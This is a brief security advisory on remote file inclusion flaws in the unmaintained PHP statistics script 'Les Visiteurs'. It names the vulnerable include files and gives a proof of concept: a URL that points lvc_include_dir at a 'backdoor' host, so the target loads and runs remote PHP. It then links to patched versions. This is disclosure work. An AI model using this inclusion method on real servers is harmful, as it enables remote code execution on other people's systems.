Les Visiteurs is a great statistics script written in php.

It gives you some graphicals informations on visitors of

your website.



This script was distributed by phpinfo.net but is no more

maintained since a year.



---------

In this version severals unprotected includes can be found 

in files:



- include/config.inc.php

- include/new-visitor.inc.php



It is possible to include a php file from a backdoor server, 

and execute it on the target's server.

You just have to create on the backdoor srv these files:

- lang/<lang>.inc.php

- db/db_mysql.inc.php



fill one with something like:

<?

echo '<?

echo "<br><br>included from backdoor server :p<br>";

?>';

?>



and call an url as:

http://host/path/include/config.inc.php?lvc_include_dir=http://backdoor/

---------





Because the script is not maintained and will not be patched,

i make some tarballs with a patched version.



You will find it at this url:

http://chezwam.net/main/publications/lesvisiteurs/



Matthieu Peschaud

Epita - France